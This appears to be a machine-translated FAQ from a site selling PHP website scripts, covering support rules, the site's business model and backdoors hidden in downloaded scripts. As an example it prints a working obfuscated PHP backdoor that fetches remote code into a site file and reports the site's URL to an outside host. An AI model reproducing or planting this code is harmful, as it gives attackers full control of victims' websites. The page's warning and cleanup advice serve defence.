I do not know what username and password from the admin panel?
Before you puzzle the support service, Write your QUESTION in the comments to the script. We have a service-Installing a script on hosting. UNDERSTAND one thing-We simply cannot physically help everyone. We are not script developers. We sell a digital product! The scripts are sold AS IS! We do not make refunds for the purchased goods. IMPORTANT! The scripts are working! We check them before posting them!
Before you puzzle the support service, Write your QUESTION in the comments to the script. We have a service-Installing a script on hosting. UNDERSTAND one thing-We simply cannot physically help everyone. We are not script developers. We sell a digital product! The scripts are sold AS IS! We do not make refunds for the purchased goods. IMPORTANT! The scripts are working! We check them before posting them!
This is the marketing plan of our site. Many scripts on our resource cost 1-5 thousand rubles – but unfortunately we will sell them for a year for this price!
In this section, we post scripts to motivate users to visit the site
We buy scripts from reliable sellers. (WHOLESALE) We test each script for performance before putting it on sale
No, there is no catch! Since the price is minimal , it is profitable for us to have regular customers. We check scripts for vulnerabilities, shells, knockers, backdoors-with two programs ( if there are suspicions, we check manually ) + plus, we have a service for additional protection and manual script verification, see the section-Services
This is a programmer’s mistake or a hole specially left by a hacker to hack your site. The scheme is as follows: They leave a backdoor + a knocker in a popular script and throw it into the public. After you download and install the script (knocker), notify the author about the domain and, accordingly, through the left hole, you will be flooded with a web shell and get full access to all your website on the hosting
We often come across malicious code in scripts and already recognize their authors by their handwriting
Пример бэкдора:
Пример бэкдора:
if( isset( $_GET['a'] ) && $_GET['a'] == 'd' ){
file_put_contents('core/classes/mail_server.php',file_get_contents('http://host1731685.hostland.pro/mail_server.txt'));}if( isset( $_GET['a'] ) && $url = base64_decode('aHR0cA==').(!empty($_SERVER[base64_decode('SFRUUFM=')])?base64_decode('cw=='):''). base64_decode('Oi8v').$_SERVER[base64_decode('U0VSVkVSX05BTUU=')].$_SERVER[base64_decode('UkVRVUVTVF9VUkk=')]; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, base64_decode('aHR0cDovL2JrLnNlY3VyaXR5ZnVzZS5jb20vcmVjZWl2ZXIucGhw')); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_REFERER, $_SERVER[base64_decode('U0VSVkVSX05BTUU=')].$_SERVER[base64_decode('UkVRVUVTVF9VUkk=')]); $html = curl_exec($ch);Download-AI-BOLIT Scanner for Windows xp-There is a constant update, finds most of the vulnerabilities. There are more programs (for a fee) But it is better to check the scripts manually
Example: This site is based on the WordPress engine – if you scan it with the same Aibolit, it will show from 30 vulnerabilities! Even in the most leaky script of a hype or a farm, there are rarely more than 15 of them. Naturally, WordPress is the most popular engine for websites and it is not so easy to hack it. If the antivirus has found something, it is usually not critical. Even if there is a vulnerability, then a person who knows the php language will be able to promote it. But I don’t think that he cares about your 300 rubles on PAYEER. You should pay more attention to knockers, backdoors
Have you taken out the cash register ? ((800r ) Do not rush to call the cyber police and distract a lot of respected people from important matters. It is also not necessary to demolish the site! We need to make a dump of the site. If there is not one site and you have not blocked access , all sites are infected. Next, we look at the logs on the hosting – we need to find out what actions were performed by the scoundrel who hacked you. Find out where the HOLE is. Any antivirus on the hosting will find the shell. Delete it and see how the attacker loads according to the logs. Next, you can demolish absolutely all sites and check scripts for shells, backdoors This service can be ordered from our website.
No need to shove into VirusTotal and shout that he found a virus This is a simple antivirus (not for php !!!)))) He can swear at anything-except what is necessary , and it is necessary to look for malicious php code ! Naturally, he can find SHELL Simple backdoors, JS scripts for advertising, mining.